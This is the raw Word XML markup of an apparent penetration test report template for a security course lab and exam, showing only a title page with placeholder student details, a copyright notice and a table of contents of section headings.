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B71EF4" w14:textId="5CBA9AD4" w:rsidR="004C32FD" w:rsidRPr="00E90321" w:rsidRDefault="00620F73" w:rsidP="00E90321">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:pBdr>
          <w:bottom w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="200" w:line="192" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:u w:color="17375E"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk163735930"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t>OFFENSIVE SECURITY</w:t>
      </w:r>
      <w:r w:rsidR="00E90321">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t>Penetration Test Report</w:t>
      </w:r>
      <w:r w:rsidR="0093686D">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t>Internal Lab an</w:t>
      </w:r>
      <w:r w:rsidR="00363D5A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B7AF8" w14:textId="7A46132D" w:rsidR="004C32FD" w:rsidRDefault="004C32FD">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:before="200" w:after="0" w:line="600" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5819272D" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>student@youremailaddress.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5800D432" w14:textId="686B4AE2" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:before="200" w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">OSID: </w:t>
      </w:r>
      <w:r w:rsidR="00191A7B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>My OSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D95CC1" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:before="200" w:after="0" w:line="600" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6531013E" wp14:editId="2409A5A1">
            <wp:extent cx="2602865" cy="1735455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073741826" name="officeArt object" descr="red-front-page-large.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1073741826" name="red-front-page-large.png" descr="red-front-page-large.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2602865" cy="1735455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C822BE" w14:textId="57B61CEA" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Copyright © 202</w:t>
      </w:r>
      <w:r w:rsidR="000B0B14">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offensive Security Ltd. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9A991" w14:textId="4FE97DDC" w:rsidR="00F23122" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>No part of this publication, in whole or in part, may be reproduced, copied, transferred</w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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Offensive Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0CED35" w14:textId="77777777" w:rsidR="00F23122" w:rsidRDefault="00F23122" w:rsidP="00D6306A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="DejaVu Serif" w:hAnsi="Roboto Regular" w:cs="DejaVu Serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AE0904" w14:textId="1614F42E" w:rsidR="00F23122" w:rsidRDefault="00620F73" w:rsidP="00BB687E">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:color="000000"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:r w:rsidR="00C444B0">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:color="000000"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:t>:</w:t>
      </w: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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:kern w:val="28"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:color="17375E"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o 1-2 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:spacing w:val="5"/>
          <w:kern w:val="28"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:color="17375E"/>
          <w:lang w:val="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E7AF97" w14:textId="191133FC"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1.0 Network Penetration Testing Assessment Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F264C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574822D3" w14:textId="67FE604E"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1.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F264C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056CD2DF" w14:textId="12179157"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1.2 Objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F264C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE25CCD" w14:textId="107E085D"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1.3 Requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F264C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190EE942" w14:textId="5E56C092"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2.0 High-Level Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F264C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C175913" w14:textId="09AFCF4A"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2.1 Overall Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006563CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C10E69" w14:textId="54664F45"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2.2 Recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006563CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752AA2F" w14:textId="2F3406FC"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3.0 Methodologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006563CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957B753" w14:textId="71B76AC6"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3.1 Information Gathering</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006563CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520B45B" w14:textId="40F45B77"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3.2 Service Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00174E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3F2A9" w14:textId="61B16360"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3.3 Penetration Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00174E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70EA94" w14:textId="0A32788A"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3.4 Maintaining Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00174E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3F78C" w14:textId="606AB459"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3.5 House Cleaning</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00174E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C9025" w14:textId="77777777"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4.0 Attack Reports</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752D6ED" w14:textId="77777777"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4.1 Attack 1: Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C02C4" w14:textId="77777777"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4.1.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2C350" w14:textId="539B39B6"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4.1.2 Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00174E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BB10D" w14:textId="490FBBEA"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4.1.3 Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00174E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE40329" w14:textId="7BC93157"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4.1.4 Recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00174E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5A01A7" w14:textId="27899E10"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4.2 Attack 2: Web Attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE41A2" w14:textId="3658B066"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4.2.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C288EC9" w14:textId="21E806DE"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4.2.2 Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA91EE" w14:textId="77777777"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4.2.3 Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BD3A4C" w14:textId="75E927A4"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4.2.4 Recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B721920" w14:textId="37F3723F"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4.3 Attack 3: Password Attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B683D">
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233ABE36" w14:textId="6EB9E33E"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4.3.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C444B0">
        <w:rPr>
